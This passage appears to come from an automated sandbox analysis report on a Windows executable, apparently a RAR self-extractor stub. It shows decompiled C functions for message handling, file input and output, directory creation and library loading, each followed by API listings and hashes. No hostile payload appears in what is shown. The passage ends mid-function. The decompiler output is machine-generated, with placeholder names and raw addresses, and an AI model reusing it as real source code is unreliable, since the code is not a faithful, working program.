                						TranslateMessage( &_v32);
                						_t14 = DispatchMessageW( &_v32); // executed
                						return _t14;
                					}
                					_t7 = IsDialogMessageW(_t10,  &_v32); // executed
                					if(_t7 == 0) {
                						goto L3;
                					}
                				}
                				return _t7;
                			}

                APIs
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBA399
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBA3AA
                • IsDialogMessageW.USER32(000202DA,?), ref: 00CBA3BE
                • TranslateMessage.USER32(?), ref: 00CBA3CC
                • DispatchMessageW.USER32(?), ref: 00CBA3D6
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Message$DialogDispatchPeekTranslate
                • String ID:
                • API String ID: 1266772231-0
                • Opcode ID: d3a68b8975cf5e6aa2d9cca6929e9861aa3b5134fd5f52e7db441a22d99f4fe4
                • Instruction ID: fdc7017adb14935826186b60d50f9e471960625198e75cb54bb64b3740cbaf3c
                • Opcode Fuzzy Hash: d3a68b8975cf5e6aa2d9cca6929e9861aa3b5134fd5f52e7db441a22d99f4fe4
                • Instruction Fuzzy Hash: D2F0BD71D12229AB8B20DBE5EC4CFEF7FACEE053517404516F55AD2010E764D505C7A1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 25%
                			E00CB9AA0(intOrPtr* __ecx) {
                				char _v8;
                				intOrPtr _v12;
                				char _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				char _v32;
                				intOrPtr _t10;
                
                				_t10 = E00CAFCFD(L"riched20.dll"); // executed
                				 *__ecx = _t10;
                				 *0xcddffc(0); // executed
                				_v16 = 8;
                				_v12 = 0x7ff;
                				 *0xcddeb4( &_v16);
                				_v32 = 1;
                				_v28 = 0;
                				_v24 = 0;
                				_v20 = 0;
                				L00CBD820(); // executed
                				 *0xcddf08(0xce75c0,  &_v8,  &_v32, 0); // executed
                				return __ecx;
                			}

                APIs
                  • Part of subcall function 00CAFCFD: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CAFD18
                  • Part of subcall function 00CAFCFD: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAE7F6,Crypt32.dll,?,00CAE878,?,00CAE85C,?,?,?,?), ref: 00CAFD3A
                • OleInitialize.OLE32(00000000), ref: 00CB9AB9
                • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CB9AF0
                • SHGetMalloc.SHELL32(00CE75C0), ref: 00CB9AFA
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                • String ID: riched20.dll
                • API String ID: 3498096277-3360196438
                • Opcode ID: 5a8ea7fbf43a704450c3bb8634398a8abf0b478df08cff370e14c11f5889ffa3
                • Instruction ID: 1a7bbb93af4f9e7285a76993c786f19fc290733f2df604917870d99c09e69860
                • Opcode Fuzzy Hash: 5a8ea7fbf43a704450c3bb8634398a8abf0b478df08cff370e14c11f5889ffa3
                • Instruction Fuzzy Hash: 52F0FFB1D01209ABCB10AF99D849BEEFBFCEF94715F00416BE815A2251DBB456058BA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 66%
                			E00CBC891(void* __eflags, WCHAR* _a4) {
                				char _v8196;
                				int _t7;
                				WCHAR* _t12;
                				void* _t14;
                
                				_t14 = __eflags;
                				E00CBD940();
                				SetEnvironmentVariableW(L"sfxcmd", _a4); // executed
                				_t7 = E00CAF835(_t14, _a4,  &_v8196, 0x1000);
                				_t12 = _t7;
                				if(_t12 != 0) {
                					_push( *_t12 & 0x0000ffff);
                					while(E00CAF94C() != 0) {
                						_t12 =  &(_t12[1]);
                						__eflags = _t12;
                						_push( *_t12 & 0x0000ffff);
                					}
                					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12); // executed
                				}
                				return _t7;
                			}








                APIs
                • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBC8A7
                • SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBC8E3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: EnvironmentVariable
                • String ID: sfxcmd$sfxpar
                • API String ID: 1431749950-3493335439
                • Opcode ID: 3bf8684b6ae233941fee505b4437a9b1ab258b1088a6b40041141a82e4cfc763
                • Instruction ID: 18d9221daf775851551abe74eaaca1123a265637dc64f2b48b73ac2dedff7106
                • Opcode Fuzzy Hash: 3bf8684b6ae233941fee505b4437a9b1ab258b1088a6b40041141a82e4cfc763
                • Instruction Fuzzy Hash: 56F0A772811225A6D7202FD19C49FEEB76D9F19751F004077FE8896182DA718D41DBF1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00CA964A(void* __ecx, void* _a4, long _a8) {
                				long _v8;
                				int _t14;
                				signed int _t15;
                				void* _t25;
                
                				_push(__ecx);
                				_t25 = __ecx;
                				if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                					 *(_t25 + 4) = GetStdHandle(0xfffffff6);
                				}
                				_t14 = ReadFile( *(_t25 + 4), _a4, _a8,  &_v8, 0); // executed
                				if(_t14 != 0) {
                					_t15 = _v8;
                				} else {
                					_t16 = E00CA9745(_t25);
                					if(_t16 == 0) {
                						L7:
                						if( *((intOrPtr*)(_t25 + 0xc)) != 1) {
                							L10:
                							if( *((intOrPtr*)(_t25 + 0xc)) != 0 || _a8 <= 0x8000) {
                								L14:
                								_t15 = _t16 | 0xffffffff;
                							} else {
                								_t16 = GetLastError();
                								if(_t16 != 0x21) {
                									goto L14;
                								} else {
                									_push(0x8000);
                									goto L6;
                								}
                							}
                						} else {
                							_t16 = GetLastError();
                							if(_t16 != 0x6d) {
                								goto L10;
                							} else {
                								_t15 = 0;
                							}
                						}
                					} else {
                						_t16 = 0x4e20;
                						if(_a8 <= 0x4e20) {
                							goto L7;
                						} else {
                							_push(0x4e20);
                							L6:
                							_push(_a4);
                							_t15 = E00CA964A(_t25);
                						}
                					}
                				}
                				return _t15;
                			}








                APIs
                • GetStdHandle.KERNEL32(000000F6), ref: 00CA965A
                • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 00CA9672
                • GetLastError.KERNEL32 ref: 00CA96A4
                • GetLastError.KERNEL32 ref: 00CA96C3
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: ErrorLast$FileHandleRead
                • String ID:
                • API String ID: 2244327787-0
                • Opcode ID: 6f3a02ce651f465ab5f6ab010b451a65a78648d95029ca8ffe9d322a7153b365
                • Instruction ID: 9e34947bdd2be3c33a5aea6e6ffc289f11df34c3b860a6f126a93ab69bb2a46b
                • Opcode Fuzzy Hash: 6f3a02ce651f465ab5f6ab010b451a65a78648d95029ca8ffe9d322a7153b365
                • Instruction Fuzzy Hash: 9C11AC3050160AEFDFA05B61C943A6D77ADEF12328F00C52AF83A851A0EB749E40DF51
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00CC9A2C(signed int _a4) {
                				signed int _t9;
                				void* _t10;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0xd00768 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0xcd5ba0 + _t9 * 4);
                					_t10 = LoadLibraryExW(_t22, 0, 0x800); // executed
                					_t27 = _t10;
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0x814d2928
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}












                APIs
                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00CC2E0F,00000000,00000000,?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue), ref: 00CC9A5E
                • GetLastError.KERNEL32(?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue,00CD6058,00CD6060,00000000,00000364,?,00CC85E8), ref: 00CC9A6A
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00CC99D3,00CC2E0F,00000000,00000000,00000000,?,00CC9BD0,00000006,FlsSetValue,00CD6058,00CD6060,00000000), ref: 00CC9A78
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 74940b09e8dd5e4bf7f59799555e2955a846cebcd1e9382484752ca1d3b2b60d
                • Instruction ID: 3159c684d4a94cf6d90dbdeeca929530bf990f8a016a0b624ca05edc8158a971
                • Opcode Fuzzy Hash: 74940b09e8dd5e4bf7f59799555e2955a846cebcd1e9382484752ca1d3b2b60d
                • Instruction Fuzzy Hash: F701F736242222ABC7218A69DC48F5AB798EF457A1711422AF916D3240DB30EE00DAE0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00CB04F5() {
                				long _v4;
                				void* __ecx;
                				void* __esi;
                				void* __ebp;
                				void* _t5;
                				void* _t7;
                				int _t8;
                				void* _t12;
                				void** _t18;
                				void* _t22;
                
                				_t12 = 0;
                				if( *0xce00e0 > 0) {
                					_t18 = 0xce00e4;
                					do {
                						_t7 = CreateThread(0, 0x10000, E00CB062F, 0xce00e0, 0,  &_v4); // executed
                						_t22 = _t7;
                						if(_t22 == 0) {
                							_push(L"CreateThread failed");
                							_push(0xce00e0);
                							E00CA6CC9(E00CBE214(E00CA6CCE(0xce00e0)), 0xce00e0, 0xce00e0, 2);
                						}
                						 *_t18 = _t22;
                						 *0x00CE01E4 =  *((intOrPtr*)(0xce01e4)) + 1;
                						_t8 =  *0xce7368; // 0x0
                						if(_t8 != 0) {
                							_t8 = SetThreadPriority( *_t18, _t8);
                						}
                						_t12 = _t12 + 1;
                						_t18 =  &(_t18[1]);
                					} while (_t12 <  *0xce00e0);
                					return _t8;
                				}
                				return _t5;
                			}














                APIs
                • CreateThread.KERNELBASE ref: 00CB0519
                • SetThreadPriority.KERNEL32(?,00000000), ref: 00CB0560
                  • Part of subcall function 00CA6CCE: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA6CEC
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 88cd683908402dd93e82216900f64a7e2f2b0f06a243f40dccd5e0f0c91e156d
                • Instruction ID: 9cfd6b99706a6f2d5476261460174c861028f14fac008c2bd1af85c547c3c59b
                • Opcode Fuzzy Hash: 88cd683908402dd93e82216900f64a7e2f2b0f06a243f40dccd5e0f0c91e156d
                • Instruction Fuzzy Hash: E50126B12443016BD720AF959C81BEB33A8EB40755F30002EF68262180CAE069859A74
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 92%
                			E00CA9C34(intOrPtr* __ecx, void* __edx, void* _a4, long _a8) {
                				void* __ebp;
                				int _t24;
                				long _t32;
                				void* _t36;
                				void* _t42;
                				void* _t52;
                				intOrPtr* _t53;
                				void* _t57;
                				intOrPtr _t58;
                				long _t59;
                
                				_t52 = __edx;
                				_t59 = _a8;
                				_t53 = __ecx;
                				if(_t59 != 0) {
                					if( *((intOrPtr*)(__ecx + 0xc)) == 1) {
                						 *(_t53 + 4) = GetStdHandle(0xfffffff5);
                					}
                					while(1) {
                						_a8 = _a8 & 0x00000000;
                						_t42 = 0;
                						if( *((intOrPtr*)(_t53 + 0xc)) == 0) {
                							goto L12;
                						}
                						_t57 = 0;
                						if(_t59 == 0) {
                							L14:
                							if( *((char*)(_t53 + 0x14)) == 0 ||  *((intOrPtr*)(_t53 + 0xc)) != 0) {
                								L21:
                								 *((char*)(_t53 + 8)) = 1;
                								return _t42;
                							} else {
                								_t56 = _t53 + 0x1e;
                								if(E00CA6C55(0xce00e0, _t53 + 0x1e, 0) == 0) {
                									E00CA6E9B(0xce00e0, _t59, 0, _t56);
                									goto L21;
                								}
                								if(_a8 < _t59 && _a8 > 0) {
                									_t58 =  *_t53;
                									_t36 =  *((intOrPtr*)(_t58 + 0x14))(0);
                									asm("sbb edx, 0x0");
                									 *((intOrPtr*)(_t58 + 0x10))(_t36 - _a8, _t52);
                								}
                								continue;
                							}
                						} else {
                							goto L7;
                						}
                						while(1) {
                							L7:
                							_t32 = _t59 - _t57;
                							if(_t32 >= 0x4000) {
                								_t32 = 0x4000;
                							}
                							_t10 = WriteFile( *(_t53 + 4), _a4 + _t57, _t32,  &_a8, 0) - 1; // -1
                							asm("sbb bl, bl");
                							_t42 =  ~_t10 + 1;
                							if(_t42 == 0) {
                								goto L14;
                							}
                							_t57 = _t57 + 0x4000;
                							if(_t57 < _t59) {
                								continue;
                							}
                							L13:
                							if(_t42 != 0) {
                								goto L21;
                							}
                							goto L14;
                						}
                						goto L14;
                						L12:
                						_t24 = WriteFile( *(_t53 + 4), _a4, _t59,  &_a8, 0); // executed
                						asm("sbb al, al");
                						_t42 =  ~(_t24 - 1) + 1;
                						goto L13;
                					}
                				}
                				return 1;
                			}














                APIs
                • GetStdHandle.KERNEL32(000000F5,?,?,00CAC90A,00000001,?,?,?,00000000,00CB4AF4,?,?,?,?,?,00CB4599), ref: 00CA9C4F
                • WriteFile.KERNEL32(?,00000000,?,00CB47A1,00000000,?,?,00000000,00CB4AF4,?,?,?,?,?,00CB4599,?), ref: 00CA9C8F
                • WriteFile.KERNELBASE(?,00000000,?,00CB47A1,00000000,?,00000001,?,?,00CAC90A,00000001,?,?,?,00000000,00CB4AF4), ref: 00CA9CBC
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: FileWrite$Handle
                • String ID:
                • API String ID: 4209713984-0
                • Opcode ID: de673e04b01ee897de2a01df04c12f101d0ae3a192600fc8221665aa4b117506
                • Instruction ID: 2f9964beeff6391d7fa24c6024dadcba41f07b4eb86ef87334578f176a6f6bc4
                • Opcode Fuzzy Hash: de673e04b01ee897de2a01df04c12f101d0ae3a192600fc8221665aa4b117506
                • Instruction Fuzzy Hash: 89315B7154470BAFDB208F15C80ABAAFBE8FF5272CF008519F16557590C774A989CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CA9EF2(void* __ecx, void* __eflags, WCHAR* _a4, char _a8, intOrPtr _a12) {
                				short _v4100;
                				signed int _t8;
                				long _t10;
                				void* _t11;
                				int _t18;
                				WCHAR* _t21;
                
                				E00CBD940();
                				_t21 = _a4;
                				_t8 =  *(E00CAB927(__eflags, _t21)) & 0x0000ffff;
                				if(_t8 == 0x2e || _t8 == 0x20) {
                					L3:
                					if(E00CA9E6B(_t21) != 0 || E00CAB32C(_t21,  &_v4100, 0x800) == 0 || CreateDirectoryW( &_v4100, 0) == 0) {
                						_t10 = GetLastError();
                						__eflags = _t10 - 2;
                						if(_t10 == 2) {
                							L12:
                							_t11 = 2;
                						} else {
                							__eflags = _t10 - 3;
                							if(_t10 == 3) {
                								goto L12;
                							} else {
                								_t11 = 1;
                							}
                						}
                					} else {
                						goto L6;
                					}
                				} else {
                					_t18 = CreateDirectoryW(_t21, 0); // executed
                					if(_t18 != 0) {
                						L6:
                						if(_a8 != 0) {
                							E00CAA12F(_t21, _a12); // executed
                						}
                						_t11 = 0;
                					} else {
                						goto L3;
                					}
                				}
                				return _t11;
                			}










                APIs
                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F19
                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F4C
                • GetLastError.KERNEL32(?,?,?,?,00CA9DFE,?,00000001,00000000,?,?), ref: 00CA9F69
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: CreateDirectory$ErrorLast
                • String ID:
                • API String ID: 2485089472-0
                • Opcode ID: 2945c989f57bc49f41dc11eded6fcea5948b2dafa0bda2f7d4a5298946786250
                • Instruction ID: 0258b754b6a47da8f250342ffff80e942912822f57870167fc2ef97a75417100
                • Opcode Fuzzy Hash: 2945c989f57bc49f41dc11eded6fcea5948b2dafa0bda2f7d4a5298946786250
                • Instruction Fuzzy Hash: 0F01D23150525669DB219AE54C0BBFE335CDF07748F044412FA11D2052DB74DA81D6A2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E00CA399D(void* __ecx, signed int __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				char _t76;
                				signed int _t83;
                				intOrPtr _t94;
                				void* _t120;
                				char _t121;
                				void* _t123;
                				void* _t130;
                				signed int _t144;
                				signed int _t148;
                				void* _t151;
                				void* _t153;
                
                				_t143 = __edx;
                				_t123 = __ecx;
                				E00CBD870(E00CD11BE, _t153);
                				E00CBD940();
                				_t151 = _t123;
                				_t156 =  *((char*)(_t151 + 0x6cc4));
                				if( *((char*)(_t151 + 0x6cc4)) == 0) {
                					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
                					if(__eflags > 0) {
                						L26:
                						E00CA134C(__eflags, 0x1e, _t151 + 0x1e);
                						goto L27;
                					}
                					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
                					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
                					if(__eflags > 0) {
                						goto L26;
                					}
                					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
                					__eflags = _t83;
                					if(_t83 != 0) {
                						L7:
                						_t120 = _t151 + 0x20e8;
                						E00CAC5C9(_t83, _t120);
                						_push(_t120);
                						E00CB14DE(_t153 - 0xe6ec, __eflags);
                						_t121 = 0;
                						 *((intOrPtr*)(_t153 - 4)) = 0;
                						E00CB2842(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)), 0);
                						_t148 =  *(_t153 + 8);
                						__eflags =  *(_t153 + 0xc);
                						if( *(_t153 + 0xc) != 0) {
                							L15:
                							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
                							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
                								L18:
                								E00CAA728(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
                								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
                								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
                								 *((char*)(_t151 + 0x2110)) = _t121;
                								E00CAC67C(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
                								_t130 = _t151 + 0x20e8;
                								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
                								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
                								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
                								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
                								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
                								_t144 =  *(_t151 + 0x5634);
                								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
                								 *(_t153 - 0x9aa0) = _t144;
                								 *((char*)(_t153 - 0x9a8c)) = _t121;
                								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
                								if(__eflags != 0) {
                									E00CB24D9(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
                								} else {
                									_push(_t144);
                									_push(_t94);
                									_push(_t130); // executed
                									E00CA910B(_t121, _t144, _t148, __eflags); // executed
                								}
                								asm("sbb edx, edx");
                								_t143 =  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b;
                								__eflags = E00CAA6F6(_t151 + 0x21a0, _t148, _t151 + 0x5640,  ~( *(_t151 + 0x569a) & 0x000000ff) & _t151 + 0x0000569b);
                								if(__eflags != 0) {
                									_t121 = 1;
                								} else {
                									E00CA6BF5(__eflags, 0x1f, _t151 + 0x1e, _t151 + 0x45f8);
                									E00CA6E03(0xce00e0, 3);
                									__eflags = _t148;
                									if(_t148 != 0) {
                										E00CAFBBB(_t148);
                									}
                								}
                								L25:
                								E00CB16CB(_t153 - 0xe6ec, _t143, _t148, _t151);
                								_t76 = _t121;
                								goto L28;
                							}
                							_t143 =  *(_t151 + 0x21bc);
                							__eflags =  *((intOrPtr*)(_t143 + 0x5124)) - _t121;
                							if( *((intOrPtr*)(_t143 + 0x5124)) == _t121) {
                								goto L25;
                							}
                							asm("sbb ecx, ecx");
                							_t138 =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
                							__eflags =  ~( *(_t151 + 0x5670) & 0x000000ff) & _t151 + 0x00005671;
                							E00CAC634(_t151 + 0x20e8, _t121,  *((intOrPtr*)(_t151 + 0x566c)), _t143 + 0x5024, _t138, _t151 + 0x5681,  *((intOrPtr*)(_t151 + 0x56bc)), _t151 + 0x569b, _t151 + 0x5692);
                							goto L18;
                						}
                						__eflags =  *(_t151 + 0x5634);
                						if(__eflags < 0) {
                							L12:
                							__eflags = _t148;
                							if(_t148 != 0) {
                								E00CA1EDE(_t148,  *((intOrPtr*)(_t151 + 0x5630)));
                								E00CAC699(_t151 + 0x20e8,  *_t148,  *((intOrPtr*)(_t151 + 0x5630)));
                							} else {
                								 *((char*)(_t151 + 0x2111)) = 1;
                							}
                							goto L15;
                						}
                						if(__eflags > 0) {
                							L11:
                							E00CA134C(__eflags, 0x1e, _t151 + 0x1e);
                							goto L25;
                						}
                						__eflags =  *((intOrPtr*)(_t151 + 0x5630)) - 0x1000000;
                						if(__eflags <= 0) {
                							goto L12;
                						}
                						goto L11;
                					}
                					__eflags =  *((intOrPtr*)(_t151 + 0x5669)) - _t83;
                					if( *((intOrPtr*)(_t151 + 0x5669)) != _t83) {
                						goto L7;
                					} else {
                						_t76 = 1;
                						goto L28;
                					}
                				} else {
                					E00CA134C(_t156, 0x1d, _t151 + 0x1e);
                					E00CA6E03(0xce00e0, 3);
                					L27:
                					_t76 = 0;
                					L28:
                					 *[fs:0x0] =  *((intOrPtr*)(_t153 - 0xc));
                					return _t76;
                				}
                			}


















                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp
                Similarity
                • API ID: H_prolog
                • String ID: CMT
                • API String ID: 3519838083-2756464174
                • Opcode ID: b7df51d3c13e415532324613b20d21659510c2c019ebb70d865b15e460b0a40d
                • Instruction ID: f484f3c82bcf576786c21a0fc19658228a8005a9ea79bdc4aff2a4c829143520
                • Opcode Fuzzy Hash: b7df51d3c13e415532324613b20d21659510c2c019ebb70d865b15e460b0a40d
                • Instruction Fuzzy Hash: 0871B171500B86AEDB21DF70CC51AEBB7E8AB16309F44496EF5AB87142D6316B44EF10
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00CCA51E(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                				signed int _v8;
                				char _v264;
                				char _v520;
                				char _v776;
                				char _v1800;
                				char _v1814;
                				struct _cpinfo _v1820;
                				intOrPtr _v1824;
                				signed char _v1828;
                				signed int _t63;
                				void* _t67;
                				signed char _t68;
                				intOrPtr _t69;
                				void* _t72;
                				char _t73;
                				char _t74;
                				signed char _t75;
                				signed int _t76;
                				signed char _t88;
                				signed int _t91;
                				signed int _t92;
                				signed int _t93;
                				void* _t94;
                				char* _t95;
                				intOrPtr _t99;
                				signed int _t100;
                
                				_t93 = __edx;
                				_t63 =  *0xcdd668; // 0x814d2927
                				_v8 = _t63 ^ _t100;
                				_t99 = _a4;
                				_t4 = _t99 + 4; // 0x5efc4d8b
                				if(GetCPInfo( *_t4,  &_v1820) == 0) {
                					_t47 = _t99 + 0x119; // 0xccab69
                					_t94 = _t47;
                					_t88 = 0;
                					_t67 = 0xffffff9f;
                					_t68 = _t67 - _t94;
                					__eflags = _t68;
                					_v1828 = _t68;
                					do {
                						_t95 = _t94 + _t88;
